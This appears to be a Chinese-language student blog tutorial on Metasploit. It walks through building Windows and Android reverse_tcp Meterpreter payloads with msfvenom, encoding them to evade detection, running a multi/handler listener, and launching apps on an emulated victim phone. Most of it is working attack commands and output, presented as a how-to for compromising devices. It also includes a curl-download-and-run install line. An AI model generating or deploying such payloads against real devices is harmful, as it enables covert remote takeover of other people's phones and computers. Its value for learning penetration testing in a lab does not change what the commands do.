MSF的使用

MFS

Metasploit 简称(MSF)是一款流行的开源渗透测试框架,由Rapid7公司开发,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和Payload工具,可用于漏洞利用、及漏洞攻击。同时软件自身支持多种操作系统平台,包括Windows、Linux、MacOS等。直到今天Metasploit已成为众多黑客手中渗透攻击的利器,并在安全领域大展身手。

Metasploit框架主要包含以下几个组件:

模块库:包含了一系列攻击模块和Payload工具,用户可以利用这些模块快速构造攻击代码。

  • Payload生成器:支持生成多种类型的Payload,包括反向Shell、Meterpreter、WebShell等。
  • 渗透测试工具:支持多种渗透测试技术,包括端口扫描、漏洞扫描、密码破解等。
  • 数据库:用于存储Metasploit框架的数据和攻击结果,包括模块信息、主机信息、漏洞信息等。
  • 插件系统:支持自定义插件,可以扩展Metasploit的功能。

本次的環境

用的是Kali Linux (2024.1) , 內有MSF , 如果沒有安裝用:

1
2
3
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall

查看Kali Linux 系统IP地址:

1
ip addr

可以ping一下確認是否能連接

1.開啟MFS

1
msfconsole
5bb5f421-78a1-49fa-970b-e7291b9ee6de.png

2.用到msfvenom命令

命令 功能
-p 指定需要使用的payload
-l 列出指定模块的所有可用资源
-n 为payload预先指定一个NOP滑动长度,用于防止程序崩溃。
-f 指定输出格式,例如exe、elf、php、js等。
-e 指定需要使用的encoder编码器,以隐藏恶意代码。
-a 指定payload的目标架构,例如x86、x64等。
–platform 指定payload的目标平台,例如Windows、Linux等。
-s 设定有效攻击荷载的最大长度。
-b 设定规避字符集,以防止生成的payload中包含不可用字符。
-i 指定payload的编码次数。
–shellest 最小化生成payload。

例子:

1
msfvenom -p android/meterpreter/reverse_tcp ... #這是指定android的

-e 编码器 :

Encoder 描述
alphanum 使用字母数字字符对代码进行编码。
alpha_upper 使用大写字母字符对代码进行编码。
fnstenv_mov 使用FPU指令对代码进行编码。
jmp_call_additive 使用跳转指令和调用指令对代码进行编码。
nonalpha 使用非字母字符对代码进行编码。
nonupper 使用非大写字母字符对代码进行编码。
unicode_upper 使用Unicode字符对代码进行编码。

原整例子:

1
2
3
4
5
6
7
8
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
lhost=127.0.0.1 lport=9999 -e x86/shikata_ga_nai -i 3 -b '\x00\x0a\xff' -f exe -o payload.exe

msfvenom -p windows/meterpreter/reverse_tcp -b'\x0\x0b' \
lhost=127.0.0.1 lport=9999 -f dll > payload.dll

msfvenom -p android/meterpreter/reverse_tcp \
lhost=127.0.0.1 lport=9999 R> /home/kali/payload.apk
bfd5d40ce1dd2d43839f515453278d34.png

Android(舊版)

1
2
msfvenom -p android/meterpreter/reverse_tcp \
lhost=127.0.0.1 lport=9999 R> /home/kali/payload.apk

生成後發去android機上, 小弟經費有限,只能用模擬器了(哭),下學期再買安卓

760a1a839fb9e2900d4432e2e5ca3567.png

在kali下打開監聽程序:

1
use exploit/multi/handler

設置payload:

1
set payload android/meterpreter/reverse_tcp

設置IP和PORT:

1
2
set lhost 127.0.0.1 
set lport 9999
7eb4d3cd6755f16979b18344330280f9.png

啟動:

1
run
248fd01720495a2c02eff0136b06c7f7.png 191e22ecdb18f6a6524a329b7cde4045.png
1
app_list #查看app
2d92f2b5a0c7e03d30f646a2c5c9ec83.png
1
app_run [package] #自己喜歡開什麼就開什麼
7ad85d147861dd3d99eef0f1d8fe540f.png